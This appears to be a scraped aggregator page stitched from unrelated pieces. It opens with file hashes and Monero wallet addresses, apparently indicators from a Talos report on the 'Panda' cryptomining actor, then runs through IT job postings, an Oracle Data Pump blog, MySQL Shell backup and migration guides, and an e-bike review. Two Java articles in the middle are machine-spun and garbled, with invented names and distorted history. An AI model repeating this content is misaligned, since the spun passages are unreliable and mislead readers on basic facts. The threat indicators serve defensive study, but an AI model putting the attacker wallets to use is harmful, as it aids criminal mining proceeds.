2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb 829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec 1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a 34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb 29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f 3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c 8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca 29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f 6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d
Monero Wallets
49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh 44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L
#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */
Go to Source Author: Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda” Original Post from Talos Security Author: By Christopher Evans and David Liebenberg. Executive summary A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware.
0 notes
hireindianpvtltd · 6 years ago
Text
Fwd: Urgent requirements with one of our Clients.
New Post has been published on https://www.hireindian.in/fwd-urgent-requirements-with-one-of-our-clients/
Fwd: Urgent requirements with one of our Clients.
Hi  
  Job Title
Location
Technical Lead – Web methods Admin
Framingham, MA
HR Technical Resource with EBS
Arlington, VA
Oracle BRM (Billing Revenue Management) Tester
San Antonio, TX
Magento Developer
Coppell, TX
Big Machines/ Oracle CPQ Cloud architect
Sunnyvale, CA
Drupal Architect
Fort worth, TX
  Job Title: Technical Lead – Web methods Admin
Location: Framingham, MA
Duration: 1 year
  Job Description 
4+ Years of Experience System Administration experience of webMethods 9.9 platform including Integration Server, Trading Networks, JDBC Adapter, Broker, Active Transfer Server, MWS
Optimize for Infrastructure and Deployer Experience in Installation of Fixes, Patches and Installation of webMethods product suite with most recent versions in WebMethods 9.9
Experience in planning and aligning to meet cutover activities.
Experience in Certificate Configurations, analyzing thread dumps and provide statistics.
Ability to efficiently multi-task and be self-motivated while working with others.
Experience in MSSQL and any other RDBMS(DB2/400) concepts.
Good to have hands on experience on combination of Security Protocol, Splunk, Python, Unix Scripts, Java, Talend, Angular, BigData Hadoop, Kafka, SOLR
Candidate should possess experience in client facing role and should also have experience in onsite-offshore co-ordination
Resource will be required to provide on-call support over weekends during EST hours and on Holidays on rotation basis
Job Title: HR Technical Resource with EBS
Location: Arlington, VA
Duration: Contract
  Job description
ADF/OA Framework
REST API and/or Web Services
Integration/Interfaces
Workflow/Business Events
AME (Approvals Management Engine)
XML/BI Publisher Reports
Linux/Unix scripting knowledge
SQL/PLSQL & Version Control tools
Personalization and System Administration Knowledge
Functional Knowledge for:
HR (Core HR, Compensation Workbench)
  Job Title: Oracle BRM (Billing Revenue Management) Tester
Location: San Antonio, TX
Interview Mode: Skype
Duration: 6 Months
  Skill Set:
Primary Technology : Oracle BRM (Billing Revenue Management) – Commercial Product
Extensive experience in Oracle BRM functional testing or implementation
Extensive knowledge in General Ledger is preferred
Knowledge in Unix & SQL operations
Test Automation Skill is preferred
  Job Description:
To interact with Business user, Business Analyst to groom requirement / follow up on deliveries on priority
Able to estimate the effort for projects
To plan and design test strategy (functional / GL)  and sync up with offshore team
To Review the test plan & test evidences before sign off
To review and set a strategy for test automation and able to clarify technical glitches
Position: Magento Developer
Location: Coppell, TX
Contract
  Job Description:
Technical Skills:
5+ Years Magento
2 + PHP + MySQL
Git version control
Linux console
RabbitMQ
Redis
  Responsibilities:             
Review, develop and implement innovative features and functionality for tools and modules based on client need
Work with highly loaded Magento modules, complex architecture and business logic
Optimize existing code / database schemes throughout the platform
Work closely with developers and other teams as well as independently on projects
Position: Big Machines/ Oracle CPQ Cloud architect
Location: Sunnyvale, CA
Duration: 6 MONTHS
Experience: 10Years
  Job Description:
Overall 10+ years of experience in 5+ years of extensive experience in following modules:
Oracle CPQ Cloud: Site Administration
Introduction to Oracle CPQ Cloud
Data Tables
File Manager
User Management
Oracle CPQ Cloud Configuration
Product Hierarchy
Configuration flows
Rules
Layouts
Oracle CPQ Cloud Commerce
Quote and Quote lines architecture
Pricing rules and pricing engine.
Approval workflows
Oracle CPQ Cloud Document Designer
Quotation generation
XSL templates
       BML/BQML
Hands-on experience writing BML rues in Configuration and commerce.
        Integration:
3-4 implementation projects’ experience.
Worked on integrations between CPQ and CRM (SFDC OR SAP C4C).
Worked on integrations between CPQ and EBS R12 application for Q2O flow.
Excellent Oral and written communication skills. Vast experience in dealing with business users to understand and convert the complex problems statements into functional/technical design.
Job Title: Drupal Architect
Location: Fort Worth, TX
Duration: 12 Months
Experience: 8+ Years
  Job Description:
The ideal candidate should have several years of Drupal 7 and 8 experience in building large-scale web sites and applications, Service oriented architecture, integration with multiple systems, and enjoy collaborating with cross-functional teams in a fast paced environment. The successful candidate will have the ability to develop high-quality code, have excellent communication skills, love solving complex problems, and lead in project design and direction.
  Responsibilities: 
Understand and analyze business/technical requirements, architect innovative, scalable and efficient solutions
Application design with core and custom modules and implementation of Service layer and integration of application with multiple external systems.
Interact with distributed teams to ensure smooth delivery of application
Participate in daily meetings and regular planning and review sessions
Provide documentation as required and lead code reviews, planning sessions and routine status stand-ups
Provide accurate level of effort time estimates and provide recommendations for feature prioritization
Assist in release/deployment planning and execution activities
  Requirements/Qualifications: 
12+ years’ experience in web application development with minimum 6 years’ experience in Drupal application development
Advanced experience in Drupal 7, 8 and LAMP stack – PHP, MySQL and HTML/CSS/AJAX/JavaScript along
Advanced experience with Drupal architecture, best practices, and coding standards
Advance experience with third-party applications/tools and integration
Experience with Acquia Cloud Site Factory will be preferred
Experience with object-oriented design and data modelling
Experience of Web Analytics applications
Experience with performance optimization of Drupal application
Experience of DevOps, Dockers, Virtualization
Experience with source/version control systems like GIT/ SVN
Knowledge of web application security considerations
Familiarity with user experience design principles and processes
Excellent verbal/written communication skills and strong time management and analytical/problem solving abilities
Experience with continuous integration best practice and deployment strategy
Experience with Selenium or similar automated testing frameworks.
Experience in Cloud web application architecture
  Thanks & Regards,
  Mike Tye (Ravikant)
Talent Acquisition Team – North America
Vinsys Information Technology Inc
SBA 8(a) Certified, MBE/DBE/EDGE Certified
Virginia Department of Minority Business Enterprise(SWAM)
703-349-3271
www.vinsysinfo.com
https://www.linkedin.com/in/ravikant-mike-tye-janawadkar-809181122
  To unsubscribe from future emails or to update your email preferences click here .
0 notes
smileitconfusespeoplex · 7 years ago
Text
Java Taste Programs - The Simple Way To Java
Java is just a generally useful PC programming language that is parallel, class-based, object-oriented, and particularly intended to have as several delivery situations as can be likely underneath the circumstances. It is in the offing to allow request manufacturers "write after, work anywhere" (WORA), Hinting that accumulated code can hold running on all stages that improve it with no requirement for recompilation. purposes are commonly ordered to bytecode that could keep operating on any Java electronic java training (JVM) paying small respect to PC making design. Starting 2015, it is really a standout amongst the most well known programming dialects being used, particularly for customer host internet programs, with a noted 9 million developers. It was basically created by Wayne Gosling at Sun Microsystems (which has following been obtained by Oracle Corporation) and cleared in 1995 as a heart part of Sunlight Microsystems'Java stage. The language infers plenty of their syntax from D and C++, nevertheless it's less low-level facilities than equally of them. The initial and research performance its compilers, virtual machines, and type libraries were initially discharged by Sunlight below proprietary licenses. At the time of May possibly 2007, in consistence with the details of their Neighborhood Process, Sunlight relicensed the majority of their innovations underneath the GNU Basic Community License. The others have also developed elective executions of these Sun improvements, like, the GNU Compiler for Java (bytecode compiler), GNU Classpath (standard libraries), and IcedTea-Web (program plugin for applets). The most recent version is Java 8, which is the sole edition presently supported free of charge by Oracle, though earlier in the day versions are supported equally by Oracle and other individuals on a professional basis. It is a widely useful, high-level coding language developed by Sunlight Microsystems. Only a little number of architects, called the Green Team, began the dialect in 1991. it was basically called OAK, and was designed for handheld devices and set-top boxes. Walnut was unsuccessful, therefore in 1995 Sun transformed the name to Java and adjusted the language to use the blossoming World Wide Web. Today it is definitely an normally used establishment for creating and advertising content on the Web. As suggested by Oracle, there are more than 9 million Java developers overall and more than 3 million cell phones work it. It is an object-oriented language just like C++, nevertheless rearranged to dump language parts that cause normal development mistakes. Its supply signal files (documents with a.java expansion) are bought into a setup named bytecode (records with a.class augmentation), which can then be accomplished by way of a Their interpreter. Arranged Java rule may keep running on most PCs on the causes that Java interpreter and runtime environments, referred to as Java Electronic Products (VMs), exist for some functioning frameworks, including UNIX, the Macintosh OS, and Windows. Bytecode may likewise be transformed around straightforwardly in to equipment language recommendations with a just-in-time compiler (JIT). In 2007, most Java improvements were released underneath the GNU Normal Public License. It is just a largely of use programming language with different parts that make the language right for use on the Earth Broad Web. Little Java programs are called Java applets and may be downloaded from a Internet machine and keep working on your own PC by way of a Java-compatible Web browser. Applications and sites employing it will not perform until it is presented on your gadget. When you download it, the item contains the Java Runtime Environment (JRE) which will be estimated to keep working in a Internet browser. A part of the JRE, the Java Plug-in coding enables Java applets to help keep operating inside different browsers. The state Java website provides hyperlinks to freely obtain the most up-to-date alternative of it. You are able to utilize the website to find out about accessing it, verify it's fitted on your desktop, eliminate older versions, troubleshoot Java or report an issue. After adding It, you will need to system your Internet browser.
0 notes
atravelingcrescendo · 7 years ago
Text
Career in PHP or Java: Which One Is Greater For Novices?
working on any Java electronic equipment (JVM) spending little regard to PC developing design. Starting 2015, it is just a standout amongst the most well known development dialects used, especially for customer machine web programs, with a reported 9 million developers. It was basically created by David Gosling at Sunlight Microsystems (which has subsequent been received by Oracle Corporation) and released in 1995 as a center phase of Sun java training stage. The language infers plenty of its syntax from C and C++, but it has less low-level facilities than both of them. The first and guide performance its compilers, virtual products, and type libraries were originally released by Sunlight under proprietary licenses. At the time of May 2007, in consistence with the details of its Neighborhood Method, Sun relicensed nearly all their advances underneath the GNU Common Public License. Others have also developed elective executions of the Sunlight improvements, for example, the GNU Compiler for Java (bytecode compiler), GNU Classpath (standard libraries), and IcedTea-Web (program plugin for applets). The most up-to-date version is Java 8, which will be the sole variation presently reinforced free of charge by Oracle, although earlier designs are reinforced both by Oracle and others on a commercial basis. It is just a globally of good use, high-level development language developed by Sun Microsystems. Only a little group of architects, called the Green Staff, began the dialect in 1991. it was named OAK, and was designed for mobile gadgets and set-top boxes. Walnut was lost, so in 1995 Sun changed the title to Java and modified the language to use the blossoming World Broad Web. Nowadays it can be an ordinarily applied establishment for producing and transferring content on the Web. As indicated by Oracle, there are more than 9 million Java developers over all and more than 3 million mobile phones run it. It is definitely an object-oriented language much like C++, however rearranged to dump language components that trigger normal coding mistakes. Their resource signal files (documents with a.java expansion) are bought right into a arrangement named bytecode (records with a.class augmentation), which can then be executed by way of a Its interpreter. Fixed Java code may keep operating on most PCs on the grounds that Java interpreter and runtime surroundings, known as Java Virtual Machines (VMs), exist for many working frameworks, including UNIX, the Macintosh OS, and Windows. Bytecode can also be transformed over straightforwardly in to unit language directions with a just-in-time compiler (JIT). In 2007, many Java improvements were cleared under the GNU General Community License. It is a commonly useful coding language with different components which make the language right for use on the World Large Web. Small Java applications are named Java applets and may be downloaded from a Internet machine and hold working on your own PC with a Java-compatible Web browser. Applications and web sites utilizing it won't function unless it's introduced on your own gadget. Once you obtain it, the merchandise provides the Java Runtime Atmosphere (JRE) which can be estimated to help keep running in a Internet browser. A segment of the JRE, the Java Plug-in development enables Java applets to keep operating inside different browsers. The state Java site provides links to easily obtain the most recent plan of it. You are able to make use of the site to learn more about getting it, validate it is fitted on your pc, remove older versions, troubleshoot Java or report an issue. Following installing It, you will need to restart your Internet browser.
0 notes
deepika456-blog · 8 years ago
Text
Data Pump Mode
Oracle DBA professional is there for you to make your career in Oracle.
During the previous year we have seen 3 new editions of Oracle: 9i, 10g and 11g.There is an often requested and I do ask well which is the best or which are the best popular functions of Oracle.
Real Program Groups and Information Secure in 9i
Grid Management and Information Push in 10g
Automatic SQL Adjusting and Edition-Based Redefinition in 11g
There have been so many new, excellent and essential functions but let us say that they all are in the improvement of humanity and the latest growth of IT. Perhaps?
In 11gR2, Oracle chooses introducing Information Push Heritage Method to be able to offer in reverse interface for programs and parameter data files used for exclusive export/import programs. The certification temporarily says: “This function allows customers to proceed using exclusive Trade and Transfer programs with Information Push Trade and Transfer. Growth time is decreased as new programs do not have to be designed.”
If you examine AristaDBA’s Oracle Weblog and browse the first three sections you will probably see what it is about. I completely believe the fact with all published there.
And I don’t really get it, why do we have Information Push Heritage Mode? Oracle customers poorly need it? Exp/imp was so, so great that we must have it back? How about RAC Heritage Method if I want to use gc_files_to_lock or freeze_db_for_fast_instance_recovery parameters? There really was a parameter known as freeze_db_for_fast_instance_recovery, I am not creating this up. Run this one:
SELECT kspponm,
DECODE(ksppoflg, 1,'Obsolete', 2, 'Underscored') as "Status"
FROM x$ksppo
WHERE kspponm like '%freeze%'
ORDER BY kspponm;
However, the Information Push Heritage Method function prevails and once you use any traditional export/import parameter you allow data pump in legacy mode. Just one parameter is enough. In Oracle language, Information Push goes into legacy mode once it chooses a parameter exclusive to exclusive Trade or Transfer is existing. Of course some factors like shield, make, pack, object_consistent, recordlength, resumable, research, gather, filesize, tts_owners, streams_configuration and streams_instantiation are merely ignored.
Now, here is a paradox or simple certification error: deferred_segment_creation is set to TRUE automatically in 11gR2. Have a look at the documentation:
SQL> create table TEST (c1 number, c2 varchar2(10), c3 date) storage (initial 5M);
Table created.
SQL> select bytes, blocks, segment_type, segment_name from dba_segments where segment_name='TEST';
no rows selected
C:\>expdp julian/password dumpfile=data_pump_dir:abc_%U.dat schemas=julian include=TABLE:in('TEST') logfile=abc.log buffer=1024
Export: Release 11.2.0.2.0 - Production on Wed May 11 07:53:45 2011
Copyright (c) 1982, 2009, Oracle and/or its affiliates.  All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
 Legacy Mode Active due to the following parameters:
 Legacy Mode Parameter: "buffer=1024" Location: Command Line, ignored.
 Legacy Mode has set reuse_dumpfiles=true parameter.
Starting "JULIAN"."SYS_EXPORT_SCHEMA_01":  julian/******** dumpfile=data_pump_dir:abc_%U.dat schemas=julian
 include=TABLE:in('TEST') logfile=abc.log reuse_dumpfiles=true
Estimate in progress using BLOCKS method...
Processing object type SCHEMA_EXPORT/TABLE/TABLE_DATA
Total estimation using BLOCKS method: 0 KB
Processing object type SCHEMA_EXPORT/TABLE/TABLE
. . exported "JULIAN"."TEST"                                 0 KB       0 rows
Master table "JULIAN"."SYS_EXPORT_SCHEMA_01" successfully loaded/unloaded
******************************************************************************
Dump file set for JULIAN.SYS_EXPORT_SCHEMA_01 is:
  C:\ORACLE\ADMIN\JMD\DPDUMP\ABC_01.DAT
Job "JULIAN"."SYS_EXPORT_SCHEMA_01" successfully completed at 07:54:07
But it is not true that you cannot export tables with no segments. Here is the proof:
C:\>exp userid=julian/abc file=C:\Oracle\admin\JMD\dpdump\a.dmp tables=julian.test
Export: Release 11.2.0.2.0 - Production on Wed May 11 08:31:08 2011
Copyright (c) 1982, 2009, Oracle and/or its affiliates.  All rights reserved.
Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
Export done in AL32UTF8 character set and AL16UTF16 NCHAR character set
About to export specified tables via Conventional Path ...
. . exporting table                           TEST          0 rows exported
Export terminated successfully without warnings.
But ignore about this Heritage Method. Do not use. Imagine it does not quit
Let us look now at some new popular functions of Information Push. Remember that in 11gR2 several of limitations have been already removed:
– The limitation that in TABLES mode all tables had to live in the same schema.
– The limitation that only one item (table or partition) could be specified if wildcards were used as aspect of the item name.
For RAC users: Information Push employee procedures can now be allocated across RAC circumstances, a aspect of Oracle RAC circumstances, or limited to the example where the Information Push job begins. It is also now possible to begin Information Push tasks and run them on different Oracle RAC circumstances at the same time.
For XMLType line users: there is a new DISABLE_APPEND_HINT value on the DATA_OPTIONS parameter which hinders the APPEND sign while running the information item.
For EBR users: particular versions can be released and brought in. Using the SOURCE_EDITION parameter upon trade and the transfer TARGET_EDITION parameter you can trade a certain version of the data source and transfer into a particular version of the data source.
Information Push is among the Oracle resources with least bugs! Although it challenging to say these days what is a bug, what is an element, what is a copy enhancement. There are about 100 kinds of insects.
Thus our Oracle training course is always there for you to be DBA professional.
0 notes
globalmediacampaign · 5 years ago
Text
Faster logical backup of a single table in MySQL.
Logical backup’s are of great use in data migration across cloud environments and table level recoveries. The new Mysql shell 8.0.22 ,has introduced a couple of new utilities named util.dumpTable() and util.exportTable() to export individual tables from a MySQL. Prior to 8.0.22 it is not possible to make a backup of single table using MySQL Shell.MySQL Shell’s new table dump utility  util.dumpTables() from this we can take the dump of the specific tables of the  schema using this utility.it works in the same way as the instance dump utility util.dumpInstance() and schema dump utility util.dumpSchemas() introduced in 8.0.21, but with a different selection of suitable options. The exported items can then be imported into a MySQL Database Service DB System (a MySQL DB System, for short) or a MySQL Server instance using MySQL Shell’s dump loading utility util.loadDump() MySQL Shell’s new table export utility util.exportTable() it exports the relational data file in a local server We can take the dump of the  huge table faster  using  util.dumpTables() it will take less time compare to the mysqldump and mydumper and mysqlpump Making dump using util.dumpTables() We need the latest MySQL Shell 8.0.22 . For our use case I have loaded 10M records on a single table using Sysbench. The size of data post loading is around 20GB.Loading the data with 10M record using sysbench [root@mydbopstest ~]# sysbench /usr/share/sysbench/oltp_read_write.lua --mysql-port=3306 --mysql-user=root --mysql-password --mysql-socket=/data/mysql/mysql.sock --mysql-db=test1 --db-driver=mysql --tables=1 --table-size=100000000 prepare sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2) Creating table 'sbtest1'... Inserting 100000000 records into 'sbtest1' Creating a secondary index on 'sbtest1'... [root@mydbopstest ~]# Step 1 : Connect the MySQL server with Shell utility In this case my database Server is MySQL 5.7.30 ( Percona ). The Shell utility is compatible with any mysql versions. [root@mydbopstest ~]# mysqlsh root@localhost --socket=/data/mysql/mysql.sock Please provide the password for 'root@/data%2Fmysql%2Fmysql.sock': ********** MySQL Shell 8.0.22 Copyright (c) 2016, 2020, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help' or '?' for help; 'quit' to exit. Creating a session to 'root@/data%2Fmysql%2Fmysql.sock' Fetching schema names for autocompletion... Press ^C to stop. Your MySQL connection id is 2660844 Server version: 5.7.30-33-log Percona Server (GPL), Release 33, Revision 6517692 No default schema selected; type use to set one. MySQL localhost JS > Step 2: Initiate the single table backup with shell utility Ensure that you have connected the shell utilities on JS mode. We have used the default threads of 4 at the time of backup. MySQL localhost JS > util.dumpTables("test1", [ "sbtest1" ], "/root/dump_table"); Acquiring global read lock Global read lock acquired All transactions have been started Locking instance for backup NOTE: Backup lock is not supported in MySQL 5.7 and DDL changes will not be blocked. The dump may fail with an error or not be completely consistent if schema changes are made while dumping. Global read lock has been released Writing global DDL files Writing DDL for table `test1`.`sbtest1` Preparing data dump for table `test1`.`sbtest1` Data dump for table `test1`.`sbtest1` will be chunked using column `id` Running data dump using 4 threads. NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `test1`.`sbtest1` will be written to 788 files 1 thds dumping - 101% (100.00M rows / ~98.57M rows), 278.86K rows/s, 55.22 MB/s uncompressed, 24.63 MB/s compressed Duration: 00:06:55s Schemas dumped: 1 Tables dumped: 1 Uncompressed data size: 19.79 GB Compressed data size: 8.83 GB Compression ratio: 2.2 Rows written: 100000000 Bytes written: 8.83 GB Average uncompressed throughput: 47.59 MB/s Average compressed throughput: 21.23 MB/s It took around 7 Min ( 6:55 ) to make a backup of single table of size 20GB. The backup are stored in the compressed tsv files. Step 3: Load the single table backup via shell utility Now let us load the single table data back via util.loadDump() utility. We have used the 4 threads to import these data. MySQL localhost JS > util.loadDump("/root/dump_table",{schema:'test1'}) Loading DDL and Data from '/home/root/dump_table' using 4 threads. Opening dump... Target is MySQL 5.7.30-33-log. A dump was produced from MySQL 5.7.30-33-log Checking for pre-existing objects... Executing common preamble SQL [Worker003] Executing DDL script for `test1`.`sbtest1` [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 4 thds loading | 2% (399.22 MB / 19.79 GB), 2.60 MB/s, 1 / 1 tables done[Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 Deleted: 0 Skipped: 0 Warnings: 0 [Worker000] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker003] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker001] test1@[email protected]: Records: 126903 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] test1@sbtest1@@787.tsv.zst: Records: 127339 Deleted: 0 Skipped: 0 Warnings: 0 Executing common postamble SQL 788 chunks (100.00M rows, 19.79 GB) for 1 tables in 1 schemas were loaded in 30 min 20 sec (avg throughput 7.98 MB/s) 0 warnings were reported during the load. MySQL localhost JS > It took around 30 min to load the data. Further optimisation is still possible with disable redo log in MySQL 8 and improving the parallelism. But this is a huge improvement. Using MySQL Shell utilities will save more time comparing to other logical backup tools. I have repeated the test with other popular logical backup tool like mysqldump and mydumper. The results are below. Tool mysqldump mydumper Shell utilities Backup Time 20 Min 10 Min 7 Min Import Time 60 Min 50 Min 30 Min Size of backup 12 GB 10 GB 8 GB Comparing other logical backup toolsThe MySQL Shell utility seems to be faster on single table backup and loading too. This can help database engineers in table rebuild for partitions, migration across cloud infra and it can be replace the regular logical backup too. https://mydbops.wordpress.com/2020/11/20/mysql-shell-dump-loading-utility/
0 notes
wordpress-blaze-230204402 · 14 days ago
Text
Specialized Turbo Levo – Elevating the E-MTB Benchmark
Tumblr media
In the dynamic realm of electric mountain bikes, the Specialized Turbo Levo has consistently set standards. The latest model, a blend of technological sophistication and rugged capability, promises to elevate your trail experience. We took it for a rigorous test to see if it lives up to the hype.
Cutting-Edge Tech Meets Trail-Ready Performance
Core Features
Motor and Battery Efficiency: The Turbo Levo's heart is its quietly powerful motor, complemented by a long-lasting battery. It's designed for endurance and reliability, ensuring that even the most ambitious routes are within your grasp.
Frame and Suspension Dynamics: The bike's structure strikes a balance between durability and nimbleness. The refined suspension system adeptly tackles the rigours of challenging trails, enhancing rider control.
Smart Connectivity: With the integration of Specialized's Mission Control app, riders have unprecedented control over their ride experience. Tailor your bike’s performance to your liking, from motor output to tracking your epic rides.
Tumblr media Tumblr media
On the Trail
On the trails, the Turbo Levo is a revelation. Its motor assists not just with a silent push on ascents but also ensures that the bike feels natural and responsive. Downhill, it's a stable beast, giving you confidence to tackle tricky descents. Whether navigating tight switchbacks or powering over rocky paths, the Turbo Levo handles with an assuredness that's both impressive and exhilarating.
Who Will Love This Bike?
The Turbo Levo will attract a broad audience. From seasoned mountain bikers looking for an e-bike that doesn’t compromise on performance, to those seeking a powerful companion for adventurous explorations, it caters to a wide spectrum of riders.
Tumblr media Tumblr media Tumblr media
Investment Worth Considering?
There's no skirting around it: the Turbo Levo is a premium product with a price tag to match. However, for those who value the intersection of top-tier technology and trail-conquering capability, it represents a worthwhile investment.
Our Take
The Specialized Turbo Levo is not just another e-mountain bike; it's a statement. It combines technological innovation with trail performance in a way that few others can match. This bike is about pushing boundaries – both of the trails you ride and what you expect from an e-MTB.
Tumblr media
Source: Specialized Turbo Levo – Elevating the E-MTB Benchmark
81 notes · View notes
globalmediacampaign · 5 years ago
Text
How to Migrate On-premises MySQL Database to MySQL Database ServiceMDS ?
Guide to Migrate Production MySQL Database running on On-premises to Oracle Cloud MySQL Database Service(MDS) ? I have one production database which i would like to migrate into Oracle Cloud PaaS model i.e MySQL Database Service , we will walk through on how to migrate customerDB database from On-premises to Oracle Cloud MySQL Database Service(MDS). Note:- Recommended is to have MySQL DB On-Premises and MDS  both must have same version i.e 8.0 and Utility shell MySQL shell must be 8.0.21 onwards. make sure app is disconnected and not allowing any traffic during the migration process. We will use two new features introduced with latest release of MySQL 8.0.21. 1.      Dump Schema Utility a.       This will help us to take the backup from On-promises database and export  to Oracle Cloud Object Storage. 2.       Load Dump Utility a.       This is help us to Import the schema from Object Storage to local compute Instance. More info:- https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-utilities-dump-instance-schema.html How does Migration Work ? Suppose you wanted to do lift-shift of database called “customerDB” , so “Schema Dump” utility will export customerDB database from on-premises to OCI(oracle cloud infrastructure) object storage. Then “Load Dump” utility will import directly to MySQL Database Service running in Oracle Cloud as PAAS model. Below diagram I have made for clear understanding… What do we needed handy ? 1.       MySQL Shell 8.0.21 Version. 2.       On-premises MySQL Up and Running. 3.       MDS Up and Running. 4.       Install OCI CLI on On-premises Machine. 5.       Install OCI CLI on OCI(Oracle Cloud Compute Instance) 6.       local_infile variables must be ON  for destination machine. How to deploy MDS ? Below blog will help us to create MDS instance:-  Additional Details On-Premises Instance Details Oracle Cloud Compute Instance Details MDS Details Database Name:- CustomerDB IP:- 192.168.1.10 User:- root Port: 3306 DB Size ~ 1.4 GB No of Tables: 800 Public IP Address: 140.238.227.xx SSH ppk file User:- opc MDS Private IP Address:- 10.0.0.xx MySQL Username:- admin MySQL Port: 3306    Command to Export the backup from On-premises to OCI Object Storage Open MySQL Shell and connect to OnP MySQL Instance then execute below commands MySQL  JS > shell.connect("root@localhost"); Creating a session to 'root@localhost' Fetching schema names for autocompletion... Press ^C to stop. Your MySQL connection id is 28 (X protocol) Server version: 8.0.21-commercial MySQL Enterprise Server - Commercial No default schema selected; type use to set one.  MySQL  localhost:33060+ ssl  JS >py Check for Compatibility issues and gather the problems in advance before migration by using DRYRUN MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {dryRun: true, ocimds: true})   O/P MySQL  localhost:33060+ ssl  JS > util.dumpSchemas(["CustomerDB"], "CustomerDBdump", {dryRun: true, ocimds: true}) Checking for compatibility with MySQL Database Service 8.0.21 NOTE: Database CustomerDB had unsupported ENCRYPTION option commented out ERROR: Function CustomerDB.fn_emailcheck - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Function fn_stockopengapup - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Trigger CustomerDB.DATA_ID - definition uses DEFINER clause set to user ` abc `@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: Procedure sp_checkUserComplaince - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or a user with SET_USER_ID or SUPER privileges ERROR: View CustomerDB.performanceInfo - definition uses DEFINER clause set to user `abc`@`` which can only be executed by this user or 